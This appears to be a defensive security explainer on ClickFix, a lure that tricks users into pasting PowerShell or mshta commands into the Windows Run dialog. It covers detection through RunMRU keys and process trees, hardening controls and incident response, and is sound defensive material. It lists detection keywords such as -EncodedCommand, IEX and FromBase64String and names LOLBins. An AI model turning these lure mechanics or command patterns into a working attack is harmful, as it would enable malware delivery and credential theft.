The email body is plain text and gateways find nothing malicious. The intermediate page is often a freshly registered clean domain or a compromised legitimate site, which delays categorisation by web filters. Perimeter detection and blocking arrive late and the decision always ends up in front of the user.
What ClickFix is
ClickFix is a social engineering technique that convinces a victim to copy a piece of text, paste it into a system window (typically the Windows Run dialog opened with Win+R, or a terminal) and press Enter. What runs is PowerShell, mshta, curl, bitsadmin or any interpreter that happens to be available, and it runs with the user's own privileges. The wrapper changes — fake CAPTCHA, simulated Word or Chrome error, fake blue screen, meeting invitation asking for verification — but the underlying mechanic is always the same. The second stage downloads the actual loader and drops infostealers, RATs or access for follow-on campaigns. The technique slips past email gateways, antivirus and classic phishing simulations because the initial content is plain text and execution is started by the user inside their own session.
Why it matters
For an operational security team ClickFix matters because in eighteen months it has moved from researcher curiosity to a dominant delivery vector for malware via email in many vendor telemetries. ESET measured a 517% growth in ClickFix and FakeCAPTCHA campaigns between the second half of 2024 and the first half of 2025. Microsoft's August 2025 blog post «Think before you Click(Fix)» calls it one of the most effective delivery methods seen in years, with thousands of devices affected daily in their global telemetry. Adoption by state-sponsored groups (APT28, Kimsuky, MuddyWater) confirms it is mature enough to be relied upon in espionage operations. The operational consequence is direct: classic awareness training teaches people not to open attachments and not to click suspicious links, but ClickFix asks the user to paste text, an act that office culture treats as harmless. Most organisations have never trained that specific defensive reflex.
Key points
Execution is started by the user inside their own session. Modern EDR and antivirus do not block powershell.exe spawned from explorer.exe by default because it is a normal sequence on any workstation. Detecting it requires inspecting the command line, not the binary, and matching parameters like -EncodedCommand, -nop, -W hidden or IEX.
The HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU registry key stores whatever the user typed in the Run dialog and is the best source of primary evidence. A rule firing on powershell, mshta, curl, IEX, FromBase64String or URLs in that value yields almost zero false positives on healthy corporate endpoints.
Microsoft Defender's Attack Surface Reduction (ASR) rules block several of the binaries ClickFix relies on: obfuscated scripts, Office child processes, execution via PSExec or WMI and unsigned files launched from the endpoint. None of them is perfect; the four combined raise the cost of the operation substantially. Disabling Win+R via GPO on standard profiles closes the most common lure.
The final payload is well documented: Lumma Stealer, NetSupport RAT, AsyncRAT, DanaBot, Latrodectus, XWorm, StealC, Quasar RAT and, in targeted operations, bespoke implants. The intent varies: credential and session cookie theft for fraud, pre-positioning for ransomware or espionage in state-sponsored campaigns.
Useful training does not look like a phishing simulation. What works is a short, sharp operational rule: no legitimate supplier, no internal system and no web page will ever ask you to paste commands into a system window. If they ask, it is fraud. Repeated in training, signage and onboarding it pays better than five email simulations.
Example: a company on Microsoft 365 hunting a ClickFix-delivered Lumma Stealer
A finance workstation in a company that runs email and collaboration on Microsoft 365 receives a link to a supposed bank receipt. The landing page presents a Cloudflare-style CAPTCHA with checkboxes that do not respond and offers a «quick verification» alternative: press Win+R, paste what is already in the clipboard and press Enter. The user complies. The pasted string is a PowerShell line with -EncodedCommand that downloads a second script; within seconds Lumma Stealer is resident in memory and the stealer collects Edge cookies and Microsoft 365 session tokens.
The SOC catches the attack through three concurrent signals. The RunMRU key on that workstation is modified with a value containing powershell and -EncodedCommand and triggers a rule with near-zero false positives. The process tree explorer.exe → powershell.exe with a long command line raises a high-severity EDR alert. An outbound connection from powershell.exe to a freshly registered domain completes the picture. Incident response isolates the endpoint, preserves the RunMRU key and the process tree as evidence, rotates passwords and revokes session tokens in Entra ID, and sweeps the rest of the estate for the same pattern, assuming the campaign will have ricocheted against several victims within the same organisation.
Common mistakes
- Assuming the email gateway will block ClickFix. The body is plain text; the malicious content does not appear until the second or third hop. The defence must be designed for the user, not for the perimeter.
- Training staff only with classic phishing simulations. The user receiving the lure does not open an attachment or click a suspicious link: they paste three lines and press Enter. If that reflex is not specifically trained, they will do it.
- Assuming EDR will catch powershell.exe by default. Heuristics do not fire on explorer.exe → powershell.exe because it is a legitimate sequence; detection requires inspecting the command line, not the binary.
- Forgetting mshta, bitsadmin, certutil, regsvr32 and rundll32. These LOLBins rarely have legitimate use on employee endpoints and should be blocked with AppLocker or WDAC on profiles that do not need them.
- Leaving Win+R enabled on standard profiles. Removing the Run dialog through Group Policy does not hurt productivity on office profiles and kills the most widespread ClickFix lure.
Related services
This concept may be related to services such as:
Frequently asked questions
What exactly is ClickFix?
A social engineering technique where the attacker convinces the victim to copy a piece of text, paste it into a system window (Run dialog or terminal) and press Enter. What executes is PowerShell, mshta or an equivalent binary that downloads malware with the user's privileges. The wrapper changes (fake CAPTCHA, Word error, fake BSOD) but the mechanic stays the same.
Why does ClickFix bypass traditional controls?
The email is plain text and gateways find nothing malicious; execution is started by the user inside their session and uses a Microsoft-signed binary; and classic awareness training teaches people not to open attachments or click links, but ClickFix asks them to paste text, an act office culture treats as harmless.
Is ClickFix the same as phishing?
It shares the social engineering layer, but the technical chain is different. Traditional phishing asks for a click or an attachment open. ClickFix asks the victim to paste text into the system and press Enter. That is why it bypasses many filters and a large share of phishing simulations.
How is ClickFix detected inside an organisation?
Three observation points. The RunMRU key under HKCU stores what was typed into the Run dialog; any value containing powershell, mshta, curl, IEX or EncodedCommand is highly suspicious. The process tree explorer.exe → powershell.exe with long encoded parameters is another. Outbound connections from powershell.exe or mshta.exe to freshly registered domains close the picture.
Which preventive controls work?
Microsoft Defender ASR rules blocking obfuscated scripts, Office child processes and unsigned executions; Win+R disabled by GPO on standard profiles; PowerShell Constrained Language Mode with script block logging shipped to the SIEM; AppLocker or WDAC restricting mshta, bitsadmin, certutil, regsvr32 and rundll32; and phishing-resistant MFA on privileged access to limit the damage if credentials are stolen.
What do I do if an endpoint has already fallen?
Isolate the workstation, preserve the RunMRU key and the process tree as evidence, rotate passwords and revoke session tokens in the IdP, sweep the estate for the same indicators and open the formal incident response procedure. ClickFix campaigns typically ricochet against several victims inside the same organisation before succeeding.